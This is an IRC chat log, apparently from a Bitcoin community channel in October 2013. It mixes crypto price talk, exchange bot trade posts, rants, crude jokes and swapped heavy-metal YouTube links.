Oct 22 22:25:56 <gecko_x2> uhh Oct 22 22:26:08 <gecko_x2> that's because you've never seen the other side Oct 22 22:26:15 <deadweasel> Bunnyh: quit fucking barking! Oct 22 22:26:16 <gecko_x2> this country is sick Oct 22 22:26:26 <gecko_x2> sick to the core Oct 22 22:26:27 <deadweasel> they all are -- they have governments. Oct 22 22:26:44 <kakobrekla> 'this' being what? Oct 22 22:27:05 <gecko_x2> ppl telling other ppl that they have to carry their 70 litres of beer through a kilometer long hot metal tube Oct 22 22:27:12 <gecko_x2> if they want to enjoy it Oct 22 22:27:16 <topace> HIM dividends up 50% this month! Oct 22 22:27:24 <gecko_x2> that is psychological sickness Oct 22 22:28:01 <gecko_x2> this country is mother fucking sick to the bones Oct 22 22:28:09 <gecko_x2> there is no respect left Oct 22 22:28:22 <kakobrekla> what is this 'this' you speak of? Oct 22 22:28:22 <gecko_x2> it's just dogs sniffing other dog's asses Oct 22 22:28:49 <gecko_x2> you'll see Oct 22 22:28:51 <gecko_x2> in time Oct 22 22:28:54 <jurov> lol if only that's the problem...you're welcome in k.u.k. legacy countries... we like our beer fresh from cooled tank Oct 22 22:29:01 <gecko_x2> or then you won't Oct 22 22:29:19 <gecko_x2> and die in HYKS realizing you never lived at all Oct 22 22:29:25 <gecko_x2> no thanks Oct 22 22:29:56 <KRS1-> where would you prefer to live gecko_x2 if you had free choice of anywhere Oct 22 22:30:12 <gecko_x2> i have my placed scouted Oct 22 22:30:12 <kakobrekla> invalid question Oct 22 22:30:15 <kakobrekla> there is no free will Oct 22 22:30:17 <gecko_x2> i won't list them here Oct 22 22:30:22 <gecko_x2> just speaking my mind Oct 22 22:30:39 <gecko_x2> feell free to /ignore at any time Oct 22 22:30:55 <deadweasel> very close. :) Oct 22 22:30:58 <deadweasel> but still fun Oct 22 22:31:00 <Bunnyh> who's telling who to carry their 70 litres of beer through a kilometer long hot metal tube? i don't understand Oct 22 22:31:05 <deadweasel> ^ Oct 22 22:31:12 <gecko_x2> bynnyh hold.. Oct 22 22:31:12 <deadweasel> explain plz, beer tubes? Oct 22 22:31:18 <gecko_x2> yes hold Oct 22 22:31:36 <deadweasel> is like a waterslide, for beer? Oct 22 22:31:47 <kakobrekla> beerslide then Oct 22 22:32:02 <gecko_x2> http://www.iltasanomat.fi/kotimaa/art-1288596509325.html Oct 22 22:32:04 <ozbot> SS: Tulli panee stopin varustamojen laittomalle viinarallille - Kotimaan uutiset - Ilta-Sanomat Oct 22 22:32:05 <kakobrekla> watch the foam. Oct 22 22:32:16 <gecko_x2> read the 157 comments Oct 22 22:32:19 <gecko_x2> you'll see. Oct 22 22:32:40 <gecko_x2> fuck sick dogs Oct 22 22:32:45 <gecko_x2> nothing more. Oct 22 22:32:55 <deadweasel> So, your entire country is fucked because you found a webpage with stuff you don't like? Oct 22 22:33:01 <deadweasel> this world is fucked Oct 22 22:33:02 <kakobrekla> lol Oct 22 22:33:05 <gecko_x2> no mas Oct 22 22:33:14 <gecko_x2> this is 20 years of this shit Oct 22 22:33:15 <deadweasel> who is mas? Oct 22 22:33:22 <gecko_x2> mas= FRIEND Oct 22 22:33:26 <deadweasel> oh, thank you! Oct 22 22:33:33 <gecko_x2> right. Oct 22 22:33:43 <gecko_x2> efnet l33t speak.. Oct 22 22:33:58 <jurov> you should definitely come to some ex-Austria-Hungary country. no such bs. Oct 22 22:34:06 <gecko_x2> i know Oct 22 22:34:11 <KRS1-> ignored Oct 22 22:34:13 <deadweasel> Another language... article about beer.... Oct 22 22:34:14 <gecko_x2> just spent 8 years in the baltics Oct 22 22:34:34 <gecko_x2> and going back for now.. Oct 22 22:34:38 <gecko_x2> later maybe south Oct 22 22:34:57 <deadweasel> gecko_x2: man, you're losing your grip a little, if you ever had it. If you have meds, take them again. Running away from sick dogs is no way to live. Oct 22 22:35:08 <gecko_x2> hehe Oct 22 22:35:27 <deadweasel> plus, wherever you go, there you are.... Oct 22 22:35:29 <gecko_x2> look this rant isn't about asking your opinion Oct 22 22:35:36 <deadweasel> don't give a shit, here it is. Oct 22 22:35:41 <gecko_x2> it's just one man telling about his life Oct 22 22:35:54 <deadweasel> you ain't told us shit about your life. Just a beer tube and sick dogs. Oct 22 22:35:59 <gecko_x2> no need to get angry or judgemental Oct 22 22:36:09 <deadweasel> other than you being a little manic, I haven't judged. Oct 22 22:36:09 <gecko_x2> lol Oct 22 22:36:14 <gecko_x2> k Oct 22 22:36:24 <deadweasel> I actually understand you because I have been you. Oct 22 22:36:27 <gecko_x2> this is irc Oct 22 22:36:33 <deadweasel> which will probably frighten you. Oct 22 22:36:42 <deadweasel> because, I'm inside of you, RIGHT NOW. Oct 22 22:36:47 <gecko_x2> omg Oct 22 22:36:52 <gecko_x2> RAEP Oct 22 22:36:56 <gecko_x2> :p Oct 22 22:37:19 <gecko_x2> lolol Oct 22 22:37:25 <deadweasel> :) Oct 22 22:37:28 <gecko_x2> anyways.. time for more music Oct 22 22:37:35 <deadweasel> ok, enough shirking work. I"m just gonna leave. Nice talking gecko_x2 Oct 22 22:37:58 <gecko_x2> k mas... be good Oct 22 22:38:01 <gecko_x2> http://www.youtube.com/watch?v=H8bDN5UIVyQ Oct 22 22:38:01 <ozbot> Evanescence - Fallen (Full Album) - YouTube Oct 22 22:41:14 <assbot> [HAVELOCK] [AM1] 1 @ 0.61 BTC [+] Oct 22 22:44:15 <assbot> [HAVELOCK] [AM1] 1 @ 0.601 BTC [-] Oct 22 22:45:16 <assbot> [HAVELOCK] [AM1] 18 @ 0.60000001 = 10.8 BTC [-] {3} Oct 22 23:04:36 <assbot> [HAVELOCK] [AM1] 2 @ 0.6 = 1.2 BTC [-] {2} Oct 22 23:09:41 <assbot> [HAVELOCK] [AM1] 2 @ 0.590001 = 1.18 BTC [-] Oct 22 23:13:30 <ThickAsThieves> http://bitcoinmagazine.com/7659/betcoin-tm-allegedly-fraudulent-activity/ Oct 22 23:13:31 <ozbot> BetCoin.tm's Allegedly Fraudulent, Unethical and Illegal Activity – Bitcoin Magazine Oct 22 23:13:44 <ThickAsThieves> but what if betcoin are they guys that bought satoshidice? Oct 22 23:14:43 <jurov> On the whole, the global Bitcoin space is a self-policing community that uproots and exposes scams and unethical Bitcoin service operators with ruthless efficiency. Oct 22 23:14:50 <jurov> HAHAHAHAHA Oct 22 23:15:02 <jborkl> oh damn, that is so untrue Oct 22 23:15:07 <jborkl> lol Oct 22 23:18:21 <jurov> "it is important to say that the majority of the bitcoin gambling operators believe in honesty and integrity" oh my Oct 22 23:18:51 <mircea_popescu> jurov lawl. Oct 22 23:18:58 <mircea_popescu> bitcoin magazine being the chief example of such. Oct 22 23:19:18 <mircea_popescu> i don't recall the last time they pushed a scam. Oct 22 23:21:52 <ThickAsThieves> i do Oct 22 23:22:26 <ThickAsThieves> vitalik is part of that quantum mining thing Oct 22 23:22:44 <ThickAsThieves> the article is so trashy also Oct 22 23:23:05 <ThickAsThieves> like some tabloid rag making wild claims Oct 22 23:24:11 <mircea_popescu> my sarcastifier ;/ Oct 22 23:25:13 <ThickAsThieves> i know, i chose to desarcastify Oct 22 23:27:03 <mircea_popescu> "i chose not to run" lol Oct 22 23:27:29 <mircea_popescu> dude my motherfucking head. this is the last time i kiss on the first date Oct 22 23:27:33 <mircea_popescu> fucking hussies. Oct 22 23:28:07 <ThickAsThieves> mp is twitterpated Oct 22 23:28:28 <mircea_popescu> no, i just got the world's worst flu. Oct 22 23:28:37 <mircea_popescu> i just blew enough filling for a whole key lime pie out of my nose Oct 22 23:28:41 <mircea_popescu> same exact color and consistency too Oct 22 23:28:45 <mircea_popescu> one go! Oct 22 23:28:56 <ThickAsThieves> ah sinus infection Oct 22 23:29:43 <ThickAsThieves> remember not to pick your nose after theyve been down someone's pants Oct 22 23:30:04 <mircea_popescu> how many noses do i have iyo! Oct 22 23:30:32 <ThickAsThieves> one for each pant Oct 22 23:30:39 <mircea_popescu> lol Oct 22 23:31:13 <mircea_popescu> a man, a pant, a canal - panama! Oct 22 23:32:18 <ThickAsThieves> i have to go to a halloween party Oct 22 23:32:39 <ThickAsThieves> i think i will be kenny powers Oct 22 23:33:04 <assbot> [HAVELOCK] [NEOBEE] 125 @ 0.00223999 = 0.28 BTC [-] Oct 22 23:33:24 <mircea_popescu> cause you're so poor ? Oct 22 23:33:49 <ThickAsThieves> cause i dont like wearing wacky clothes Oct 22 23:34:07 <ThickAsThieves> he wears all black and sunglassed pretty much Oct 22 23:34:11 <ThickAsThieves> sunglasses Oct 22 23:34:20 <ThickAsThieves> so just need mullet and goatee Oct 22 23:34:35 <ThickAsThieves> will have to shave my neckbeard for this Oct 22 23:34:48 <mircea_popescu> i thought kenny got killed anyway Oct 22 23:34:52 <ThickAsThieves> nope Oct 22 23:34:56 <ThickAsThieves> he faked his death Oct 22 23:35:10 <mircea_popescu> wait, i was thinking kenny mccormick Oct 22 23:35:31 <ThickAsThieves> https://www.google.com/url?sa=t&rct=j&q=&esrc=s&source=web&cd=2&cad=rja&sqi=2&ved=0CDcQtwIwAQ&url=http%3A%2F%2Fwww.youtube.com%2Fwatch%3Fv%3DbgDaVLCaBzQ&ei=ieFmUuXIKYT29gTtgoGQDA&usg=AFQjCNE9tyqOxODGGzELM0Ex61Hmd1Ilew&sig2=owzcyjR3NL77wwwr2rs7Gw&bvm=bv.55123115,d.eWU Oct 22 23:35:32 <mircea_popescu> dude there's no way to dress for halloween easier than sp kenny. all eh wears is an anorak Oct 22 23:35:47 <ThickAsThieves> http://www.youtube.com/watch?v=bgDaVLCaBzQ Oct 22 23:35:48 <ozbot> BEST OF KENNY POWERS - YouTube Oct 22 23:38:23 <ThickAsThieves> that best of sucks Oct 22 23:39:10 <assbot> [HAVELOCK] [AM100] 51 @ 0.0057 = 0.2907 BTC [-] Oct 22 23:39:11 <assbot> [HAVELOCK] [HIM] 4 @ 0.073999 = 0.296 BTC [+] Oct 22 23:40:16 <Vexual> http://www.abc.net.au/news/2013-10-23/an-gold-found-in-gum-tree-leaves/5039226 Oct 22 23:40:17 <ozbot> CSIRO scientists find gold in Western Australian eucalyptus trees - Australia Network News (Australi Oct 22 23:41:07 <dub> money grows on trees nao? Oct 22 23:41:46 <mircea_popescu> does this explain the pandas ? Oct 22 23:42:13 <assbot> [HAVELOCK] [B] [XBOND] 1596 @ 0.0011499 = 1.8352 BTC [+] Oct 22 23:42:14 <dub> koalas? Oct 22 23:42:22 <mircea_popescu> a that ty Oct 22 23:42:33 <mircea_popescu> whichever azn minibear tat's not fucking Oct 22 23:43:16 <ThickAsThieves> somebody tell kenilworth Oct 22 23:46:17 <assbot> [HAVELOCK] [HIM] 10 @ 0.073999 = 0.74 BTC [+] Oct 22 23:47:18 <assbot> [HAVELOCK] [AM1] 1 @ 0.62 BTC [+] Oct 22 23:52:02 <Vexual> i like the shit eating "i get patent cheques" grin of mr koala Oct 22 23:54:46 <ThickAsThieves> ;;nethash Oct 22 23:54:46 <gribble> 3176962.68127 Oct 22 23:54:49 <ThickAsThieves> ;;estimate Oct 22 23:54:50 <gribble> Next difficulty estimate | 378407272.822 based on data since last change | 443809787.464 based on data for last three days Oct 22 23:55:50 <ThickAsThieves> its odd watching the coinbase btc/usd price Oct 22 23:56:03 <ThickAsThieves> this morning it was very close to goxprice, but with a $5 spread Oct 22 23:56:12 <ThickAsThieves> now its like $12 under gox Oct 22 23:57:02 <Vexual> with a $2 spead Oct 22 23:59:25 <Vexual> http://www.google.com/finance?q=USDCNY Oct 22 23:59:25 <ozbot> US Dollar: CURRENCY:USD quotes & news - Google Finance Oct 23 00:03:35 <assbot> [HAVELOCK] [AM1] 1 @ 0.59 BTC [-] Oct 23 00:04:31 <mircea_popescu> skinnkavaj hiow's litecoin doing these days ? Oct 23 00:05:18 <skinnkavaj> mircea_popescu: It's crashing really hard as expected. From 1st of november the uptrend starts. Oct 23 00:05:20 <Scrat> ThickAsThieves: if there's an upwards trajectory, they benefit by raising the price Oct 23 00:05:28 <mircea_popescu> wait, "as expected" now ? Oct 23 00:05:34 <skinnkavaj> Yes Oct 23 00:05:34 <mircea_popescu> you're getting a feature piece over this lol. Oct 23 00:05:35 <skinnkavaj> I said Oct 23 00:05:37 <skinnkavaj> Low will be Oct 23 00:05:40 <skinnkavaj> 0.007 Oct 23 00:05:48 <skinnkavaj> LTC/BTC Oct 23 00:06:45 <mircea_popescu> nope. the first time you mentioned this "0.007" was yesterday. Oct 23 00:06:51 <mircea_popescu> so no, you didn't "say". Oct 23 00:07:31 <Vexual> license to die? Oct 23 00:08:15 <Vexual> the names coin Oct 23 00:08:30 <Vexual> lite coin Oct 23 00:08:38 <ThickAsThieves> ltc is awesome because when bitcoin goes up, it goes down. And when bitcoin goes down, LTC goes down too. Such a giving lover. Oct 23 00:09:37 <ThickAsThieves> so now youve got an ocean of ltc speculators all trying to put a ring on her. Oct 23 00:09:37 <mircea_popescu> poor ltc. Oct 23 00:09:44 <ThickAsThieves> but all she wants to do is go down Oct 23 00:10:08 <dub> skinnkavaj = fontas? Oct 23 00:10:28 <ThickAsThieves> = vancleef=bithub Oct 23 00:11:02 <dub> oh jesus Oct 23 00:11:25 <ThickAsThieves> =usagi? Oct 23 00:11:27 <mircea_popescu> i thoughrt vancleef = madonna Oct 23 00:11:27 <ThickAsThieves> obv Oct 23 00:13:23 <taub> keeping the bitstamp orderbook open for too long crashes my firefox Oct 23 00:13:25 <taub> gah Oct 23 00:13:31 <taub> but its some interesting shit going down there Oct 23 00:13:37 <taub> 100k being thrown around left and right Oct 23 00:13:37 <dub> its firefox Oct 23 00:15:02 <jurov> just bitstamp trying some 'sploits Oct 23 00:15:23 <mircea_popescu> prolly firefox still leaking memory Oct 23 00:17:29 <taub> ThickAsThieves: ltc has been sorta steady in terms of $ Oct 23 00:17:55 <taub> 1.7-1.8 during this recent btc bull move Oct 23 00:19:23 <pankkake> that's not very impressive, especially as USD is losing value Oct 23 00:19:45 <taub> yea Oct 23 00:20:59 <pankkake> and I guess it's part of the rise of BTC/USD too Oct 23 00:21:19 <pankkake> I'm glad I don't have USDs in bitstamp :) Oct 23 00:22:46 <taub> :/ Oct 23 00:23:00 <pankkake> being an eurofag and all Oct 23 00:23:13 <taub> bfx <> bitstamp price parity has been having troubles Oct 23 00:23:25 <taub> Not enough USD reserve on Bitstamp, you cannot buy on Bitstamp at the moment. Oct 23 00:23:32 <taub> hard to trade bfx off bitstamp charts that way Oct 23 00:23:59 <taub> then again, everybody being thsi long might be a warning flag Oct 23 00:30:24 <gecko_x2> http://www.youtube.com/watch?v=OH4C4mh6RME Oct 23 00:30:25 <ozbot> Disturbed - Indestructible [Full Album] - YouTube Oct 23 00:33:40 <pankkake> that's teenager music Oct 23 00:34:26 <gecko_x2> and who's gonna run this world? Oct 23 00:34:40 <dub> robots Oct 23 00:34:53 <dub> not teenagers thats for sure Oct 23 00:35:03 <gecko_x2> you're gonna die Oct 23 00:35:05 <dub> useless little cunts Oct 23 00:35:12 <gecko_x2> and teenagers are gonna run it Oct 23 00:35:18 <dub> unlikely Oct 23 00:35:53 <gecko_x2> you must be about 25 Oct 23 00:36:06 <gecko_x2> enjoy while it lasts Oct 23 00:37:47 <pankkake> teenagers with attitude Oct 23 00:39:11 <jurov> and starry eyes Oct 23 00:41:13 <dub> yes, 25 Oct 23 00:41:22 <dub> still a teenager myself Oct 23 00:41:41 <gecko_x2> then /ignore me immediately Oct 23 00:41:48 <gecko_x2> and go live Oct 23 00:42:03 <dub> you lost me at from finland in all honesty Oct 23 00:42:15 <gecko_x2> u dunno anything about that Oct 23 00:42:22 <dub> never had a usful encounter with a fin Oct 23 00:42:24 <gecko_x2> and you shouldn't Oct 23 00:43:02 <dub> and I find racial stereotypes most efficient Oct 23 00:43:19 <gecko_x2> has nothing to do with that Oct 23 00:43:29 <gecko_x2> again Oct 23 00:43:36 <gecko_x2> don't spend you're time here Oct 23 00:43:39 <gecko_x2> go and live Oct 23 00:43:49 <gecko_x2> it's gonna be over in a flash Oct 23 00:44:24 <gecko_x2> i am death Oct 23 00:44:41 <gecko_x2> that's why i annoy you Oct 23 00:44:59 <jurov> i actually was in finland, did not find anything out of ordinary with finnish guys Oct 23 00:46:16 <gecko_x2> if you've seen the world, you would be aware that any people threat their guests better than their own Oct 23 00:46:28 <gecko_x2> always Oct 23 00:46:54 <mircea_popescu> http://trilema.com/2013/the-dork-of-the-month-award/ Oct 23 00:46:55 <ozbot> The dork of the month award. pe Trilema - Un blog de Mircea Popescu. Oct 23 00:47:03 <dub> clearly never been to 'murica then Oct 23 00:47:21 <gecko_x2> and clearly never been arrested abroad. Oct 23 00:47:43 <mircea_popescu> <dub> robots. not teenagers thats for sure <<< that. or meth whores. Oct 23 00:47:52 <pankkake> lol, that heinlein reference still wats me up Oct 23 00:47:55 <jurov> not in slovakia. we treat guests and locals woth the same disdain Oct 23 00:48:11 <jurov> *with . maybe guests even worse Oct 23 00:48:16 <mircea_popescu> pankkake im not even sure what it's supposed to be Oct 23 00:48:41 <pankkake> probably because heinlein wrote starship troopers thus is a fascist? Oct 23 00:48:41 <gecko_x2> lub ur fucking blog mp Oct 23 00:48:50 <mircea_popescu> i mean... guy was a pretty good sf writer neh ? pushed up the standards./ Oct 23 00:48:51 <gecko_x2> gonna read everything someday Oct 23 00:48:54 <gecko_x2> but not today Oct 23 00:48:58 <dub> is the quote formatting all fucked up? Oct 23 00:48:58 <pankkake> "October 20" you're missing skinnkavaj saying the first line Oct 23 00:49:07 <mircea_popescu> gecko_x2 it'll be hjard to do, like 5-10mn words in there Oct 23 00:49:21 <pankkake> actually the formatting is mostly broken Oct 23 00:49:24 <gecko_x2> well i'll start from jan '13 Oct 23 00:49:26 <mircea_popescu> pankkake aty Oct 23 00:49:26 <jurov> gecko_x2: seriously, visiting finnnish girl asked me why nobody is smiling in the services around here :D Oct 23 00:50:12 <mircea_popescu> what did you rtell her ? Oct 23 00:50:47 <gecko_x2> :) Oct 23 00:51:13 <gecko_x2> btw Oct 23 00:51:15 <gecko_x2> mp Oct 23 00:51:23 <gecko_x2> skinnkavaj = swedish Oct 23 00:51:32 <gecko_x2> means 'skin suite' Oct 23 00:51:56 <gecko_x2> swedish is my mother tongue Oct 23 00:51:58 <mircea_popescu> what's that mean in english ? Oct 23 00:52:10 <gecko_x2> whaty i just said Oct 23 00:52:21 <gecko_x2> suit as in fine suit Oct 23 00:52:21 <pankkake> skin suite? not skin suit? Oct 23 00:52:27 <gecko_x2> no Oct 23 00:52:32 <gecko_x2> suit as in armani suit Oct 23 00:52:37 <gecko_x2> skin suit Oct 23 00:52:54 <gecko_x2> erm Oct 23 00:52:55 <gecko_x2> sry Oct 23 00:53:01 <gecko_x2> suite yes Oct 23 00:53:10 <gecko_x2> skin suite Oct 23 00:53:12 <pankkake> I'm lost Oct 23 00:53:19 <pankkake> anyway, it means skinny vagina Oct 23 00:53:40 <gecko_x2> i dunno the correct spelling Oct 23 00:53:53 <gecko_x2> but it means as in the suite you wear for business Oct 23 00:53:55 <Vexual> this room is no good, can i see a suite? Oct 23 00:54:11 <gecko_x2> ok just wanted to note Oct 23 00:54:17 <mircea_popescu> so gecko_x2 a suit is a piece of clothing like i wear, a suite is a hotel arrangement Oct 23 00:54:24 <mircea_popescu> neither of these go with skin. you mean leather ? Oct 23 00:54:24 <assbot> [HAVELOCK] [NEOBEE] 121 @ 0.00208678 = 0.2525 BTC [-] {4} Oct 23 00:54:29 <gecko_x2> exactly Oct 23 00:54:34 <gecko_x2> like i said Oct 23 00:54:38 <gecko_x2> skin suit Oct 23 00:54:40 <mircea_popescu> a ok. so leather suit, like on a biker ? Oct 23 00:54:47 <gecko_x2> yeah Oct 23 00:54:58 <mircea_popescu> aite. leater, not skin. skin is always on a live animal. Oct 23 00:54:58 <gecko_x2> skinn = skin Oct 23 00:55:04 <mircea_popescu> like pig is alive and pork dead. Oct 23 00:55:04 <gecko_x2> kavai = suit Oct 23 00:55:24 <gecko_x2> it sounds weird even in native language Oct 23 00:55:27 <pankkake> so it means furry Oct 23 00:55:32 <gecko_x2> is why i noticed Oct 23 00:55:35 <gecko_x2> no Oct 23 00:55:42 <gecko_x2> suit like in armani suit Oct 23 00:55:43 <mircea_popescu> pankkake in fairness, i knew this very hot chick that only wore leather pants. Oct 23 00:55:50 <mircea_popescu> i think it got to be 50 degrees in her crotch. Oct 23 00:56:30 <gecko_x2> mp i once had one of those in my 2000 audi S8 Oct 23 00:56:52 <gecko_x2> only she carried a small zipbag of coke in her pussy, in her leather pants Oct 23 00:57:01 <gecko_x2> across the border. Oct 23 00:57:28 <mircea_popescu> so did it crack under the pressure ? Oct 23 00:57:33 <gecko_x2> 360 BHP freely respirated Oct 23 00:57:49 <Vexual> lol coke diamonds Oct 23 00:57:54 <gecko_x2> awd with bosch electronically locked center diff Oct 23 00:58:04 <mircea_popescu> http://www.youtube.com/watch?v=Rp7wQP2omi4 Oct 23 00:58:05 <ozbot> Direttore magistrale Duca conte PierMatteo Barambani - YouTube Oct 23 00:58:10 <mircea_popescu> btw, am i the only fantocci fan here ? Oct 23 00:58:12 <gecko_x2> top speed limited to 320 kph Oct 23 00:58:19 <gecko_x2> etc.. Oct 23 00:58:28 <assbot> [HAVELOCK] [AM100] 35 @ 0.00587 = 0.2055 BTC [+] Oct 23 00:59:55 <jurov> http://arstechnica.com/information-technology/2013/10/the-navys-newest-warship-is-powered-by-linux/ finally found my ideal colo facility :D Oct 23 01:00:06 <mircea_popescu> ha! Oct 23 01:00:30 <mircea_popescu> usure it's not osx ? Oct 23 01:01:26 <pankkake> it would be a full aluminum ship with glowing USA flag if it was Oct 23 01:01:27 <jurov> dont' matter. as long as it can alunch missiles in case of ddos Oct 23 01:02:11 <mircea_popescu> lmao if that thing ends up beached because ddos... Oct 23 01:02:15 <mircea_popescu> ima go visit the wreck. Oct 23 01:03:06 <kakobrekla> im sure they can avoid it with binoculars Oct 23 01:05:45 <mircea_popescu> maybe theres no way to get on deck Oct 23 01:05:54 <mircea_popescu> like those office buildings you can't open the windows of Oct 23 01:06:28 <Vexual> it looks super fast, is it nuclear powered? Oct 23 01:08:39 <assbot> [HAVELOCK] [NEOBEE] 141 @ 0.00201001 = 0.2834 BTC [-] Oct 23 01:09:24 <Vexual> whats the IBS on the schematic? Oct 23 01:10:30 <Vexual> Id guess Integrated power systems element is the reactor Oct 23 01:11:10 <gecko_x2> i know you're ignoring me on purpouse mp :p Oct 23 01:11:22 <gecko_x2> guess i need to find bettar music.. Oct 23 01:12:00 <Vexual> with a sensor data line to mission readiness module Oct 23 01:12:22 <Vexual> got nuke power? check Oct 23 01:12:23 <gecko_x2> http://www.youtube.com/watch?v=CAXtDPKkOlA Oct 23 01:12:24 <ozbot> In Flames - Cloud Connected [High Quality] - YouTube Oct 23 01:12:30 <Vexual> mission readiness confirmed Oct 23 01:14:08 <Vexual> see if you can find a photo on the internet of a nuclear warship throwing a top speed rooster tail. you can't Oct 23 01:14:46 <Vexual> top speed is more secret than their computer systems Oct 23 01:14:54 <pankkake> gecko_x2: https://www.youtube.com/watch?v=Ja_hDxivKrI Oct 23 01:16:09 <gecko_x2> clicked.. Oct 23 01:16:41 <gecko_x2> increasing vol and leaning back.. Oct 23 01:16:59 <gecko_x2> liking Oct 23 01:17:30 <kakobrekla> i dont understand what they are singing Oct 23 01:17:51 <pankkake> pretty much the only melodic death metal that doesn't make me vomit Oct 23 01:17:54 <gecko_x2> there is calm in your indeciscion Oct 23 01:18:23 <pankkake> though I prefer their earlier work[/hipster] Oct 23 01:19:22 <gecko_x2> youtube sidebar gave me lots of memories from this excellent hypocrisy song Oct 23 01:19:30 <gecko_x2> so thx Oct 23 01:19:32 <pankkake> I mostly do understand the lyrics Oct 23 01:19:52 <kakobrekla> yeah you need to put some effort to it Oct 23 01:20:15 <gecko_x2> look Oct 23 01:20:23 <pankkake> and then there's the passive learning of listening to it over the years Oct 23 01:20:31 <gecko_x2> basically all heavy metal is synonymous to bitcoin Oct 23 01:20:40 <gecko_x2> it's all the same story Oct 23 01:20:42 <pankkake> you mean precious metal Oct 23 01:20:49 <kakobrekla> lol Oct 23 01:20:50 <gecko_x2> it's what we all are preparing for Oct 23 01:20:59 <gecko_x2> also that yes Oct 23 01:21:10 <gecko_x2> heavy metal = heavy metal Oct 23 01:21:11 <kakobrekla> i dont see the heavy metal resembelence Oct 23 01:21:19 <gecko_x2> it's there man Oct 23 01:21:22 <pankkake> https://www.youtube.com/watch?v=MF69enruobk glorious album, and artwork, and name Oct 23 01:21:23 <ozbot> Hypocrisy - Penetralia - YouTube Oct 23 01:21:26 <gecko_x2> it's all the same story Oct 23 01:21:43 <gecko_x2> u should invite my bud piett over from efnet Oct 23 01:21:52 <assbot> [HAVELOCK] [AM1] 1 @ 0.625 BTC [+] Oct 23 01:21:53 <gecko_x2> he could link you to some real shit Oct 23 01:22:06 <gecko_x2> like this Oct 23 01:22:25 <gecko_x2> excellent links, i thankyou Oct 23 01:22:49 <dub> bitcoin is only 80% smelly neckbeards now haven't you heard Oct 23 01:22:53 <assbot> [HAVELOCK] [AM1] 2 @ 0.63 = 1.26 BTC [+] Oct 23 01:23:06 <pankkake> I'm only smelly 80% of the time Oct 23 01:23:42 <kakobrekla> 80% smelly and 20% neckbeard? Oct 23 01:24:08 <pankkake> my beard looks naturally good thankfully Oct 23 01:24:50 <gecko_x2> pankkake try this little nice tune.. Oct 23 01:25:04 <pankkake> https://www.youtube.com/watch?v=vtnG6EHh1N4 this is HEAVY metal Oct 23 01:25:11 <gecko_x2> https://www.youtube.com/watch?v=sOOebk_dKFo Oct 23 01:25:11 <ozbot> IMMORTAL (Official) - "ALL SHALL FALL" music video HD - YouTube Oct 23 01:25:21 <gecko_x2> mine first Oct 23 01:26:18 <gecko_x2> :p :p Oct 23 01:26:25 <gecko_x2> i need moar alcohol Oct 23 01:26:37 <pankkake> well I do go to concerts with earplugs :p Oct 23 01:26:43 <kakobrekla> yes if by moar you mean less. Oct 23 01:26:54 <gecko_x2> haha ofcourse Oct 23 01:26:57 <Scrat> gecko_x2: if you're going to link immortal... why link that one Oct 23 01:27:05 <gecko_x2> let me drink some less alcohol Oct 23 01:27:06 <pankkake> you don't listen to sunn o))) with your ears anyway Oct 23 01:27:18 <Scrat> is abbath's crab walk? Oct 23 01:27:21 <Scrat> is it* Oct 23 01:27:30 <soypirate> pankkake: so true Oct 23 01:27:38 <gecko_x2> haven't clicked pankkake's link yet Oct 23 01:28:12 <pankkake> I love Immortal, they just don't take themselves seriously Oct 23 01:28:22 <pankkake> omg 2:28 Oct 23 01:28:43 <gecko_x2> can't click yet Oct 23 01:28:52 <pankkake> I mean 2:28 of immortal Oct 23 01:29:33 <Scrat> pankkake: more like 0:45 Oct 23 01:29:45 <Scrat> dat fucking crab walk Oct 23 01:29:55 <gecko_x2> sexy Oct 23 01:30:25 <gecko_x2> ok now clicking pankake Oct 23 01:30:41 <gecko_x2> what are these the elves? :p Oct 23 01:30:51 <pankkake> bathrobes Oct 23 01:31:20 <pankkake> https://www.youtube.com/watch?v=pEctVHxs34U Oct 23 01:31:21 <ozbot> Abbath on Church Burnings - YouTube Oct 23 01:31:23 <gecko_x2> zomg they been in a turkish sauna ? :p Oct 23 01:32:52 <gecko_x2> nah.. this all good but i'm going retro Oct 23 01:33:04 <gecko_x2> lub all metal but getting old Oct 23 01:33:13 <gecko_x2> gonna serve u a surprise Oct 23 01:33:25 <gecko_x2> i mean i'm getting old Oct 23 01:33:31 <gecko_x2> not the music.. Oct 23 01:34:02 <pankkake> https://www.youtube.com/watch?v=4QbAXXXOJF8 that's when you know it's then end Oct 23 01:34:14 <gecko_x2> remember this my friends? Oct 23 01:34:16 <gecko_x2> https://www.youtube.com/watch?v=3Rd4_GDzNBg Oct 23 01:34:16 <ozbot> Gorky Park - Moscow Calling (Opening Eurovision 2009) - YouTube Oct 23 01:34:37 <gecko_x2> LOL Oct 23 01:34:52 <gecko_x2> ehh fuck it Oct 23 01:34:54 <gecko_x2> forhet it Oct 23 01:35:00 <gecko_x2> forget Oct 23 01:35:04 <gecko_x2> bad link Oct 23 01:35:18 <soypirate> hehe Oct 23 01:35:28 <gecko_x2> this is going to shit Oct 23 01:35:31 <gecko_x2> :D Oct 23 01:36:00 <gecko_x2> ok Oct 23 01:36:09 <gecko_x2> let's do something bettar Oct 23 01:36:37 <soypirate> this guy is the shit: Oct 23 01:36:39 <soypirate> https://www.youtube.com/watch?v=HPZX7EZIFD0 Oct 23 01:36:40 <ozbot> Guildo Horn - Guildo hat euch lieb [Eurovision 1998 - Germany] - YouTube Oct 23 01:36:51 <gecko_x2> like this mother fucking masterpiece Oct 23 01:36:59 <gecko_x2> https://www.youtube.com/watch?v=CRdFIUIC_sI Oct 23 01:36:59 <ozbot> Stratovarius - Visions - Full Album - [1997] - YouTube Oct 23 01:37:49 <soypirate> gecko_x2: nice one Oct 23 01:37:54 <gecko_x2> :D Oct 23 01:38:25 <dub> ugg bring back vexual Oct 23 01:38:31 <Vexual> :) Oct 23 01:38:58 <pankkake> this chan allows only one drunk at a time Oct 23 01:39:37 <dub> I'd rather hear outback ozzy serial killer anthems than teen masturbation soundtracks Oct 23 01:41:00 <gecko_x2> well strato has worked for me in my past weeks of drunorness Oct 23 01:41:04 <gecko_x2> dunno why Oct 23 01:41:11 <assbot> [HAVELOCK] [B] [XBOND] 260 @ 0.0011499 = 0.299 BTC [+] Oct 23 01:41:23 <pankkake> https://www.youtube.com/watch?v=dOBrGj1zw8U I listened to this as a teenager, ew Oct 23 01:41:24 <ozbot> Thy Majestie - The King And The Warrior - YouTube Oct 23 01:41:45 <gecko_x2> zomg italian metal Oct 23 01:41:53 <pankkake> can't be gayer Oct 23 01:41:56 <gecko_x2> in memory of sam? Oct 23 01:41:58 